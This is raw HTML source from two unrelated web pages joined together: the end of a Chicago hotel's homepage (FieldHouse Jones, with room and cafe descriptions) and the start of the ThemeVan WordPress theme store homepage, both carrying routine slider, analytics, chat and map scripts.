</div> <!-- LAYER NR. 5 --> <div class="tp-caption tp-resizeme" id="slide-1-layer-20" data-x="['center','center','center','center']" data-hoffset="['0','0','0','0']" data-y="['middle','middle','middle','middle']" data-voffset="['150','150','150','150']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":650,"speed":1720,"frame":"0","from":"y:50px;opacity:0;","to":"o:1;","ease":"Power2.easeInOut"},{"delay":"wait","speed":0,"frame":"999","to":"opacity:0;","ease":"nothing"}]' data-textAlign="['left','left','left','left']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 9; white-space: nowrap; font-size: px; line-height: px; font-weight: 400; color: rgba(255,255,255,1); letter-spacing: px;"><ul class="social-icons slider-i"><li><a href="https://www.facebook.com/FieldHouse-Jones-1004453812998817/?ref=br_rs" target="_blank" title="Facebook"><i class="ol-facebook"></i></a></li><li><a href="https://www.instagram.com/fieldhousejones/" target="_blank" title="Instagram"><i class="ol-instagram"></i></a></li><li><a href="https://twitter.com/fieldhousejones" target="_blank" title="Twitter"><i class="ol-twitter"></i></a></li></ul> </div> </li> </ul> <div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div> </div> <script>var htmlDiv=document.getElementById("rs-plugin-settings-inline-css");var htmlDivCss=".tp-caption.BigBold-Button,.BigBold-Button{color:rgba(255,255,255,1.00);font-size:13px;line-height:13px;font-weight:500;font-style:normal;font-family:Raleway;text-decoration:none;background-color:rgba(0,0,0,0);border-color:rgba(255,255,255,0.50);border-style:solid;border-width:1px;border-radius:0px 0px 0px 0px;letter-spacing:1px}.tp-caption.BigBold-Button:hover,.BigBold-Button:hover{color:rgba(255,255,255,1.00);text-decoration:none;background-color:transparent;border-color:rgba(255,255,255,1.00);border-style:solid;border-width:1px;border-radius:0px 0px 0px 0px;cursor:pointer}";if(htmlDiv){htmlDiv.innerHTML=htmlDiv.innerHTML+htmlDivCss;}else{var htmlDiv=document.createElement("div");htmlDiv.innerHTML="<style>"+htmlDivCss+"</style>";document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]);}</script> <script type="text/javascript">setREVStartSize({c:jQuery('#rev_slider_1_1'),responsiveLevels:[1240,1024,778,480],gridwidth:[1240,1024,778,480],gridheight:[868,768,960,720],sliderLayout:'fullscreen',fullScreenAutoWidth:'on',fullScreenAlignForce:'off',fullScreenOffsetContainer:'',fullScreenOffset:''});var revapi1,tpj=jQuery;tpj(document).ready(function(){if(tpj("#rev_slider_1_1").revolution==undefined){revslider_showDoubleJqueryError("#rev_slider_1_1");}else{revapi1=tpj("#rev_slider_1_1").show().revolution({sliderType:"standard",jsFileLocation:"//fieldhousejones.com/wp-content/plugins/revslider/public/assets/js/",sliderLayout:"fullscreen",dottedOverlay:"none",delay:9000,navigation:{keyboardNavigation:"off",keyboard_direction:"horizontal",mouseScrollNavigation:"off",mouseScrollReverse:"default",onHoverStop:"off",touch:{touchenabled:"on",touchOnDesktop:"off",swipe_threshold:75,swipe_min_touches:1,swipe_direction:"horizontal",drag_block_vertical:false}},responsiveLevels:[1240,1024,778,480],visibilityLevels:[1240,1024,778,480],gridwidth:[1240,1024,778,480],gridheight:[868,768,960,720],lazyType:"none",parallax:{type:"mouse",origo:"slidercenter",speed:2000,speedbg:0,speedls:0,levels:[2,3,4,5,6,7,12,16,10,50,47,48,49,50,51,55],disable_onmobile:"on"},shadow:0,spinner:"off",stopLoop:"off",stopAfterLoops:-1,stopAtSlide:-1,shuffle:"off",autoHeight:"off",fullScreenAutoWidth:"on",fullScreenAlignForce:"off",fullScreenOffsetContainer:"",fullScreenOffset:"",disableProgressBar:"on",hideThumbsOnMobile:"off",hideSliderAtLimit:0,hideCaptionAtLimit:0,hideAllCaptionAtLilmit:0,debugMode:false,fallbacks:{simplifyAll:"off",nextSlideOnWindowFocus:"off",disableFocusListener:false,}});}});</script> </div><!-- END REVOLUTION SLIDER --> </div></div></div></div></section><section class="w-section w-full s-padding vc_custom_1472781231319"> <div class="row w-equal-height w-row-flex"><div class="col col-4 home-padding-col"> <div class="col-inner"><div class="w-heading heading-1 text-left"> <h2>About FieldHouse Jones Hotel in River North Chicago</h2> </div><div class="w-space" style="height:20px"></div><div class="w-text-block"> <p>FieldHouse Jones is set to become the undisputed lodging phenomenon of Chicago. With flexible room types, ingenious bed arrangements, first-of-their-kind vacation-apartments, bespoke communal spaces, super-local food + drinks, inspired events, and box-fresh art, FieldHouse Jones is at once the neighborhood center of gravity and your springboard for the most unique Windy City experience.</p> </div></div></div><div class="col col-8 hidden-sm hidden-xs home-height"> <div class="section-background"><div class="bg-image" style="background-image:url(https://fieldhousejones.com/wp-content/uploads/2017/02/Fleetwood-Head-1.jpg);background-size:cover;background-position:center center"></div></div><div class="col-inner"></div></div></div></section><section class="w-section w-full m-padding vc_custom_1502209953130 full-bg-section"> <div class="section-background"><div class="bg-image" style="background-image:url(https://fieldhousejones.com/wp-content/uploads/2016/01/Two-Bed-Entry-Two-Main-Page.png);background-size:cover;background-position:center center"></div></div><div class="row w-equal-height w-row-flex"><div class="col col-8 hidden-sm hidden-xs w-text-light home-height"> <div class="col-inner"></div></div><div class="col col-4 w-text-light home-padding-col" style="background-color:rgba(0,0,0,0.45)"> <div class="col-inner"><div class="w-heading heading-2 text-left"> <h2>Rooms Available</h2> </div><div class="w-space" style="height:20px"></div><div class="w-text-block white"> <p>Accommodations at FieldHouse Jones come in a wide array of sizes, styles and sorts. From the unique Trophy (Guest) Rooms to the smart and spacious Haymaker Suites to our social Borden Beds, we’ve got the whole Field covered.</p> <p>With custom forged beds, tailored mattresses, hand-crafted tile, wide-plank oak flooring, heritage leather benches, and original curated art, FieldHouse Jones is rewriting the record books.</p> </div><div class="w-space" style="height:30px"></div><div class="w-text-block"> <p style="text-align: center;"><a class="check_btn menu_butten blue" href="/rooms/">LEARN MORE</a></p> </div></div></div></div></section><section class="w-section w-full m-padding vc_custom_1477161050773"> <div class="row w-equal-height w-align-middle w-row-flex"><div class="col col-4 home-height"> <div class="section-background"><div class="bg-image" style="background-image:url(https://fieldhousejones.com/wp-content/uploads/2016/01/DropShot-2-Small.jpg);background-size:cover;background-position:center center"></div></div><div class="col-inner"></div></div><div class="col col-8 home-padding-col"> <div class="col-inner"><div class="w-heading heading-2 text-left"> <h2>DROPSHOT COFFEE &amp; SNACK BAR</h2> </div><div class="w-space" style="height:20px"></div><div class="w-text-block"> <p><span style="font-weight: 400;"><a href="https://www.instagram.com/dropshotcoffee/?hl=en">DropShot</a> is committed to offering the finest coffees without the pretense.  We believe in accessible quality ingredients in our food and beverages.  DropShot is a destination not only for visitors to Chicago, but also for the locals.  It’s where Chicagoans can relax and tourists can taste what our town is about.</span></p> <p><span style="font-weight: 400;">We named this adventure DropShot to pay homage to the inspiration for FieldHouse Jones’ concept: classic American sports and leisure culture.  Our cafe, alongside FieldHouse Jones, reimagines what comfort can be and presents a chic image of the ways we remember how to loosen up.  </span></p> <p><span style="font-weight: 400;">DropShot is a surprising, innovative and festive social hub for you to relax, work, play, collaborate and feed off the perpetual energy as well as our local and affordable homemade food and drinks!  So please, come pop in &#8211; on your daily commute to the office, during your morning stroll, on your way back from a busy day exploring the city or even with a bunch of your best buds. You’re always welcome.  </span></p> <p><a href="https://fieldhousejones.com/wp-content/uploads/2018/12/Drink-Menu.jpg">CAFE</a> | <a href="https://fieldhousejones.com/wp-content/uploads/2019/04/IMG_8463.jpg">FOOD</a> | <a href="https://fieldhousejones.com/wp-content/uploads/2019/04/Cocktails.jpg">BAR</a></p> </div></div></div></div></section> </div> </div> <script type="text/javascript" src="https://hotels.cloudbeds.com/widget/iFrameResizer"></script><script>window.iFrameResize({},'#cloudbeds')</script> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-KMXVZNH" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <footer id="footer"> <div id="footer-bottom" class="footer-v2"> <div class="container"> <div id="footer-nav" class="col-4"> <ul class="social-icons"><li><a href="https://www.facebook.com/FieldHouse-Jones-1004453812998817/?ref=br_rs" target="_blank" title="Facebook"><i class="ol-facebook"></i></a></li><li><a href="https://plus.google.com/113333608272260527376" target="_blank" title="Google+"><i class="ol-google-plus"></i></a></li><li><a href="https://www.instagram.com/fieldhousejones/" target="_blank" title="Instagram"><i class="ol-instagram"></i></a></li><li><a href="https://twitter.com/fieldhousejones" target="_blank" title="Twitter"><i class="ol-twitter"></i></a></li></ul> </div> <div class="col-8"> <div id="footer-text"> 312 W. CHESTNUT ST. CHICAGO, IL 60610 | <a href="tel:312-291-9922">312-291-9922</a> | <a href="/faq/">FAQ</a> | <a href="/privacy-policy/">PRIVACY POLICY</a> | <a href="https://staybedderman.com/careers/" target="_blank" rel="noopener">CAREERS</a> </div> </div> </div> <div id="toplink-wrapper"> <a href="#"><i class="ol-up"></i></a> </div> </div> </footer> <a id="toplink-button" href="#"> <span class="border"> <i class="ol-up"></i> </span> </a> <script type="text/javascript">function revslider_showDoubleJqueryError(sliderID){var errorMessage="Revolution Slider Error: You have some jquery.js library include that comes after the revolution files js include.";errorMessage+="<br> This includes make eliminates the revolution slider libraries, and make it not work.";errorMessage+="<br><br> To fix it you can:<br>&nbsp;&nbsp;&nbsp; 1. In the Slider Settings -> Troubleshooting set option: <strong><b>Put JS Includes To Body</b></strong> option to true.";errorMessage+="<br>&nbsp;&nbsp;&nbsp; 2. Find the double jquery.js include and remove it.";errorMessage="<span style='font-size:16px;color:#BC0C06;'>"+errorMessage+"</span>";jQuery(sliderID).show().html(errorMessage);}</script> <script src="https://fieldhousejones.com/wp-content,_plugins,_wyde-core,_assets,_js,_wyde.js,qver==3.1.6+wp-content,_plugins,_wyde-core,_shortcodes,_js,_shortcodes.js,qver==3.1.6+wp-includes,_js,_jquery,_ui,_core.min.js,qver==1.11.4+wp-includes,_js,_jquery,_ui,_effect.min.js,qver==1.11.4.pagespeed.jc.9L7Kt7_wRN.js"></script><script>eval(mod_pagespeed_b8GLPUnXzv);</script> <script>eval(mod_pagespeed_Aif$xxw7WB);</script> <script>eval(mod_pagespeed_Dk2M868_qS);</script> <script>eval(mod_pagespeed__eqjY1mmd4);</script> <script type='text/javascript' src='https://fieldhousejones.com/wp-content/themes/overlap/js/plugins.js,qver=1.0.pagespeed.jm.95LfHvPP__.js'></script> <script type='text/javascript'>var wyde_page_settings={"siteURL":"https:\/\/fieldhousejones.com","lightbox_title":"1","ajaxURL":"https:\/\/fieldhousejones.com\/wp-admin\/admin-ajax.php","ajax_search":"1","ajax_search_image":"1","ajax_search_author":"1","ajax_search_date":"1"};</script> <script type='text/javascript' src='https://fieldhousejones.com/wp-content/themes/overlap/js/main.js,qver=1.0.pagespeed.jm.91ZPkGQ9g8.js'></script> <script src="https://fieldhousejones.com/wp-content/themes/overlap/js/shortcodes.js,qver==1.0+smoothscroll.js,qver==1.0.pagespeed.jc.JRfn1WLB7w.js"></script><script>eval(mod_pagespeed_tJJSJOVSYw);</script> <script>eval(mod_pagespeed_C2JykLiKt1);</script> <script type='text/javascript' src='https://maps.google.com/maps/api/js?key=AIzaSyCe3OFflnipVwYpIP3vH1fRs49GqOf5DCE&#038;libraries=geometry%2Cplaces%2Cweather%2Cpanoramio%2Cdrawing&#038;language=en&#038;ver=5.2'></script> <script type='text/javascript'>var wpgmp_local={"select_radius":"Select Radius","search_placeholder":"Enter address or latitude or longitude or title or city or state or country or postal code here...","select":"Select","select_all":"Select All","select_category":"Select Category","all_location":"All","show_locations":"Show Locations","sort_by":"Sort by","wpgmp_not_working":"not working...","place_icon_url":"https:\/\/fieldhousejones.com\/wp-content\/plugins\/wp-google-map-gold\/assets\/images\/icons\/","wpgmp_location_no_results":"No results found.","wpgmp_route_not_avilable":"Route is not available for your requested route.","img_grid":"<span class='span_grid'><a class='wpgmp_grid'><img src='https:\/\/fieldhousejones.com\/wp-content\/plugins\/wp-google-map-gold\/assets\/images\/grid.png'><\/a><\/span>","img_list":"<span class='span_list'><a class='wpgmp_list'><img src='https:\/\/fieldhousejones.com\/wp-content\/plugins\/wp-google-map-gold\/assets\/images\/list.png'><\/a><\/span>","img_print":"<span class='span_print'><a class='wpgmp_print' data-action='wpgmp-print'><img src='https:\/\/fieldhousejones.com\/wp-content\/plugins\/wp-google-map-gold\/assets\/images\/print.png'><\/a><\/span>","hide":"Hide","show":"Show","start_location":"Start Location","start_point":"Start Point","radius":"Radius","end_location":"End Location","take_current_location":"Take Current Location","center_location_message":"Your Location","driving":"Driving","bicycling":"Bicycling","walking":"Walking","transit":"Transit","metric":"Metric","imperial":"Imperial","find_direction":"Find Direction","miles":"Miles","km":"KM","show_amenities":"Show Amenities","find_location":"Find Locations","prev":"Prev","next":"Next"};</script> <script type='text/javascript' src='https://fieldhousejones.com/wp-content/plugins/wp-google-map-gold/assets/js/maps.js,qver=2.3.4.pagespeed.jm.TaO9i5f1kE.js'></script> <script type='text/javascript'>!function(a,b){"use strict";function c(){if(!e){e=!0;var a,c,d,f,g=-1!==navigator.appVersion.indexOf("MSIE 10"),h=!!navigator.userAgent.match(/Trident.*rv:11\./),i=b.querySelectorAll("iframe.wp-embedded-content");for(c=0;c<i.length;c++){if(d=i[c],!d.getAttribute("data-secret"))f=Math.random().toString(36).substr(2,10),d.src+="#?secret="+f,d.setAttribute("data-secret",f);if(g||h)a=d.cloneNode(!0),a.removeAttribute("security"),d.parentNode.replaceChild(a,d)}}}var d=!1,e=!1;if(b.querySelector)if(a.addEventListener)d=!0;if(a.wp=a.wp||{},!a.wp.receiveEmbedMessage)if(a.wp.receiveEmbedMessage=function(c){var d=c.data;if(d)if(d.secret||d.message||d.value)if(!/[^a-zA-Z0-9]/.test(d.secret)){var e,f,g,h,i,j=b.querySelectorAll('iframe[data-secret="'+d.secret+'"]'),k=b.querySelectorAll('blockquote[data-secret="'+d.secret+'"]');for(e=0;e<k.length;e++)k[e].style.display="none";for(e=0;e<j.length;e++)if(f=j[e],c.source===f.contentWindow){if(f.removeAttribute("style"),"height"===d.message){if(g=parseInt(d.value,10),g>1e3)g=1e3;else if(~~g<200)g=200;f.height=g}if("link"===d.message)if(h=b.createElement("a"),i=b.createElement("a"),h.href=f.getAttribute("src"),i.href=d.value,i.host===h.host)if(b.activeElement===f)a.top.location.href=d.value}else;}},d)a.addEventListener("message",a.wp.receiveEmbedMessage,!1),b.addEventListener("DOMContentLoaded",c,!1),a.addEventListener("load",c,!1)}(window,document);</script> </body> </html>
0
<!DOCTYPE html><html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"/><script data-cfasync="false" id="ao_optimized_gfonts_config" type="text/javascript">WebFontConfig={google:{families:["Roboto:100,300,400,400italic,500,500italic,700,700italic,900,900italic:latin,latin-ext,vietnamese,cyrillic-ext,cyrillic,greek,greek-ext","Roboto Slab:300,400,700:latin,latin-ext,vietnamese,cyrillic-ext,cyrillic,greek,greek-ext","Lato:100,300,400,700 900:latin,latin-ext,vietnamese,cyrillic-ext,cyrillic,greek,greek-ext","Muli","Poppins","Abril Fatface:regular","Lato:100,100italic,300,300italic,regular,italic,700,700italic,900,900italic"] },classes:false, events:false, timeout:1500};</script><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pingback" href="https://www.themevan.com/main/xmlrpc.php"><link type="text/css" media="all" href="https://www.themevan.com/main/wp-content/cache/autoptimize/css/autoptimize_872b5f9167a2d23591825e29668439e0.css" rel="stylesheet" /><link type="text/css" media="screen" href="https://www.themevan.com/main/wp-content/cache/autoptimize/css/autoptimize_dfc1e511a34abbcc16cba3c3af5a943d.css" rel="stylesheet" /><title>Premium &amp; Free WordPress Themes For Your Business | ThemeVan</title> <script data-cfasync='false'>window.$crisp=[]; CRISP_RUNTIME_CONFIG = { locale : 'en' }; CRISP_WEBSITE_ID = '62e57409-adc0-48a2-a31b-dfbebbad520c';(function(){ d=document;s=d.createElement('script'); s.src='https://client.crisp.chat/l.js'; s.async=1;d.getElementsByTagName('head')[0].appendChild(s); })();</script> <meta name="description" content="ThemeVan is a Free &amp; Premium WordPress themes provider. We are working on the unique themes and plugins, we also sell our themes on Themeforest."/><link rel="canonical" href="https://www.themevan.com/" /><meta property="og:locale" content="en_US" /><meta property="og:type" content="website" /><meta property="og:title" content="Premium &amp; Free WordPress Themes For Your Business | ThemeVan" /><meta property="og:description" content="ThemeVan is a Free &amp; Premium WordPress themes provider. We are working on the unique themes and plugins, we also sell our themes on Themeforest." /><meta property="og:url" content="https://www.themevan.com/" /><meta property="og:site_name" content="ThemeVan" /><meta name="twitter:card" content="summary" /><meta name="twitter:description" content="ThemeVan is a Free &amp; Premium WordPress themes provider. We are working on the unique themes and plugins, we also sell our themes on Themeforest." /><meta name="twitter:title" content="Premium &amp; Free WordPress Themes For Your Business | ThemeVan" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/www.themevan.com\/","name":"ThemeVan","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.themevan.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <link rel='dns-prefetch' href='//s0.wp.com' /><link rel='dns-prefetch' href='//secure.gravatar.com' /><link href='https://fonts.gstatic.com' crossorigin='anonymous' rel='preconnect' /><link href='https://ajax.googleapis.com' rel='preconnect' /><link href='https://fonts.googleapis.com' rel='preconnect' /><link rel="alternate" type="application/rss+xml" title="ThemeVan &raquo; Feed" href="https://www.themevan.com/feed/" /><link rel="alternate" type="application/rss+xml" title="ThemeVan &raquo; Comments Feed" href="https://www.themevan.com/comments/feed/" /><link rel='stylesheet' id='popup-maker-site-css' href='https://www.themevan.com/main/wp-content/cache/autoptimize/css/autoptimize_single_927d72234555f14ea1784dc4c6176dcf.css?generated=1555492032&#038;ver=1.8.5' type='text/css' media='all' /> <script type='text/javascript' src='https://www.themevan.com/main/wp-includes/js/jquery/jquery.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-includes/js/jquery/jquery-migrate.min.js'></script> <script type='text/javascript'>var cnArgs = {"ajaxurl":"https:\/\/www.themevan.com\/main\/wp-admin\/admin-ajax.php","hideEffect":"fade","onScroll":"","onScrollOffset":"100","cookieName":"cookie_notice_accepted","cookieValue":"true","cookieTime":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"","cache":"","refuse":"no","revoke_cookies":"0","revoke_cookies_opt":"automatic","secure":"1"};</script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/cookie-notice/js/front.min.js'></script> <script type='text/javascript'>var objectL10n = {"yopPollParams":{"urlParams":{"ajax":"https:\/\/www.themevan.com\/main\/wp-admin\/admin-ajax.php","wpLogin":"https:\/\/www.themevan.com\/main\/wp-login.php?redirect_to=https%3A%2F%2Fwww.themevan.com%2Fmain%2Fwp-admin%2Fadmin-ajax.php%3Faction%3Dyop_poll_record_wordpress_vote"},"apiParams":{"reCaptcha":{"siteKey":""}},"captchaParams":{"imgPath":"https:\/\/www.themevan.com\/main\/wp-content\/plugins\/yop-poll\/public\/assets\/img\/","url":"https:\/\/www.themevan.com\/main\/wp-content\/plugins\/yop-poll\/app.php","accessibilityAlt":"Sound icon","accessibilityTitle":"Accessibility option: listen to a question and answer it!","accessibilityDescription":"Type below the <strong>answer<\/strong> to what you hear. Numbers or words:","explanation":"Click or touch the <strong>ANSWER<\/strong>","refreshAlt":"Refresh\/reload icon","refreshTitle":"Refresh\/reload: get new images and accessibility option!"},"voteParams":{"invalidPoll":"Invalid Poll","noAnswersSelected":"No answer selected","minAnswersRequired":"At least {min_answers_allowed} answer(s) required","maxAnswersRequired":"A max of {max_answers_allowed} answer(s) accepted","noAnswerForOther":"No other answer entered","noValueForCustomField":"{custom_field_name} is required","consentNotChecked":"You must agree to our terms and conditions","noCaptchaSelected":"Captcha is required","thankYou":"Thank you for your vote"},"resultsParams":{"singleVote":"vote","multipleVotes":"votes"}}};</script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/yop-poll/public/assets/js/yop-poll-public.min.js'></script> <script type='text/javascript' src='https://www.themevan.com/main/wp-content/plugins/themevan-toolkit/assets/vendors/jquery.easing.min.js'></script> <link rel='https://api.w.org/' href='https://www.themevan.com/wp-json/' /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.themevan.com/main/xmlrpc.php?rsd" /><link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.themevan.com/main/wp-includes/wlwmanifest.xml" /><link rel='shortlink' href='https://wp.me/P6NeZK-3uu' /><link rel="alternate" type="application/json+oembed" href="https://www.themevan.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.themevan.com%2F" /><link rel="alternate" type="text/xml+oembed" href="https://www.themevan.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.themevan.com%2F&#038;format=xml" /><meta name="generator" content="Easy Digital Downloads v2.9.12" /> <script type="text/javascript">(function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//www.themevan.com/?wordfence_lh=1&hid=E23272D41EEA37185005F3DDAB0275AB');</script> <script type="text/javascript">var AFFWP = AFFWP || {}; AFFWP.referral_var = 'partner'; AFFWP.expiration = 365; AFFWP.debug = 0; AFFWP.referral_credit_last = 1;</script> <link rel='dns-prefetch' href='//v0.wordpress.com'/><link rel='dns-prefetch' href='//c0.wp.com'/><meta name='ir-site-verification-token' value='66861627' /><meta name="p:domain_verify" content="3a68cf0d1559b6d87c6363db3fb77212"/> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-35837875-4"></script> <script>window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-35837875-4');</script> <script>!function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments)}; if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0'; n.queue=[];t=b.createElement(e);t.async=!0; t.src=v;s=b.getElementsByTagName(e)[0]; s.parentNode.insertBefore(t,s)}(window, document,'script', 'https://connect.facebook.net/en_US/fbevents.js'); fbq('init', '520200591648998'); fbq('track', 'PageView');</script> <noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=520200591648998&ev=PageView&noscript=1" /></noscript> <script>jQuery(document).ready(function($){ var itemValue = parseFloat($('.edd_cart_amount').data('total')); $('#edd-purchase-button').on('click',function(){ if(itemValue > 0){ gtag_report_conversion('https://www.themevan.com/checkout/'); } }); function gtag_report_conversion(url) { var callback = function () { if (typeof(url) != 'undefined') { window.location = url; } }; gtag('event', 'InitiateCheckout', { 'send_to': 'AW-978850913/zbDQCO3e038Q4ajg0gM', 'value': itemValue, 'currency': 'USD', 'transaction_id': '', //'event_callback': callback }); console.log(itemValue); } });</script><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://www.themevan.com/main/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--> <script>document.documentElement.classList.add( 'jetpack-lazy-images-js-enabled' );</script> <link rel="icon" href="https://www.themevan.com/main/wp-content/uploads/2014/11/fav1.png" sizes="32x32" /><link rel="icon" href="https://www.themevan.com/main/wp-content/uploads/2014/11/fav1.png" sizes="192x192" /><link rel="apple-touch-icon-precomposed" href="https://www.themevan.com/main/wp-content/uploads/2014/11/fav1.png" /><meta name="msapplication-TileImage" content="https://www.themevan.com/main/wp-content/uploads/2014/11/fav1.png" /> <noscript><style type="text/css">.wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><script data-cfasync="false" id="ao_optimized_gfonts_webfontloader" type="text/javascript">(function() {var wf = document.createElement('script');wf.src='https://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js';wf.type='text/javascript';wf.async='true';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(wf, s);})();</script></head><body class="home page-template page-template-page-templates page-template-page-blank page-template-page-templatespage-blank-php page page-id-13422 wp-custom-logo cookies-not-set group-blog edd page_transparent_nav wpb-js-composer js-comp-ver-5.7 vc_responsive"><div id="body-container"><header id="masthead" class="site-header "><div id="dgw-topbar" class="trans_nav"><div id="dgw-primary-bar" class="dgw-grid-1000"><div class="site-branding dgw-grid dgw-col2"><span class="site-title"><a href="https://www.themevan.com/" rel="home" itemprop="brand" itemscope itemtype="http://schema.org/Brand"><img itemprop="logo" id="site-logo" data-logo="https://www.themevan.com/main/wp-content/uploads/2015/11/logo_black2.png" src="https://www.themevan.com/main/wp-content/uploads/2014/03/logo_white.png" alt="ThemeVan" /></a></span></div><nav id="site-navigation" data-menu-text-color="#ffffff" class="main-navigation dgw-grid dgw-col8"> <button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false"><i class="fa fa-bars"></i></button><div class="menu-primary-menu-container"><ul id="primary-menu" class="menu"><li id="menu-item-2326" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item current_page_item menu-item-home"><a href="https://www.themevan.com/"><strong>Home</strong></a></li><li id="menu-item-33031" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.themevan.com/wordpress-themes/"><strong>Themes</strong></a></li><li id="menu-item-33116" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.themevan.com/wordpress-development-service/"><strong>Development Service</strong></a></li><li id="menu-item-2341" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.themevan.com/support/"><strong>Support</strong></a></li><li id="menu-item-9339" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.themevan.com/blog/"><strong>Blog</strong></a></li><li id="menu-item-2339" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.themevan.com/contact/"><strong>Contact</strong></a></li></ul></div></nav><div id="site-icons" class="dgw-grid dgw-col3"><a href="https://www.themevan.com/?page_id=873" id="user_account"><i class="fa fa-user"></i></a><a href="https://www.themevan.com/?page_id=5" id="product_cart"><i class="fa fa-shopping-cart"></i> <span class="header-cart edd-cart-quantity">0</span></a></div></div></div></header><div id="page" class="hfeed site"><div id="content" class="site-content"><div data-vc-full-width="true" data-vc-full-width-init="false" data-vc-stretch-content="true" data-vc-parallax="1.5" data-vc-parallax-image="https://www.themevan.com/main/wp-content/uploads/2019/03/header.jpg" class="vc_row wpb_row vc_row-fluid vc_custom_1551805404015 vc_row-has-fill vc_row_zindex_1 vc_row_opacity_1 vc_row-o-equal-height vc_row-o-content-middle vc_row-flex vc_general vc_parallax vc_parallax-content-moving"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner vc_custom_1495565575766"><div class="wpb_wrapper"><p style="font-size: 2rem;color: #ffffff;line-height: 1.2em;text-align: center" class="vc_custom_heading vc_custom_1551382752090 wpb_animate_when_almost_visible wpb_appear" data-mobile-font-size="1.6rem" >We Craft Amazing</p><h2 style="font-size: 3.2rem;color: #ffffff;line-height: 1.2em;text-align: center" class="vc_custom_heading home_top_title vc_custom_1551383950812 wpb_animate_when_almost_visible wpb_appear" data-mobile-font-size="2rem" >WordPress Themes &amp; Plugins</h2><p style="font-size: 20px;color: #ffffff;line-height: 1.5em;text-align: center;font-family:Lato;font-weight:300;font-style:normal" class="vc_custom_heading vc_custom_1551383935255 wpb_animate_when_almost_visible wpb_bottom-to-top" data-mobile-font-size="20px" >Deliver the best WordPress solution to your business</p><div class="vc_btn3-container wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp vc_btn3-center vc_custom_1551384530934" > <a style="background-color:#3e6edd; color:#ffffff;" class="vc_general vc_btn3 vc_btn3-size-lg vc_btn3-shape-rounded vc_btn3-style-custom" href="http://www.themevan.com/wordpress-themes" title="">EXPORE ALL THEMES</a></div><div class="wpb_single_image wpb_content_element vc_align_center wpb_animate_when_almost_visible wpb_fadeInUp fadeInUp vc_custom_1495708313267"><figure class="wpb_wrapper vc_figure"><div class="vc_single_image-wrapper vc_box_border_grey"><img width="1200" height="900" src="https://www.themevan.com/main/wp-content/uploads/2014/03/theme.png" class="vc_single_image-img attachment-full jetpack-lazy-image" alt="" data-lazy-srcset="https://www.themevan.com/main/wp-content/uploads/2014/03/theme.png 1200w, https://www.themevan.com/main/wp-content/uploads/2014/03/theme-300x225.png 300w, https://www.themevan.com/main/wp-content/uploads/2014/03/theme-768x576.png 768w, https://www.themevan.com/main/wp-content/uploads/2014/03/theme-1024x768.png 1024w" data-lazy-sizes="(max-width: 1200px) 100vw, 1200px" 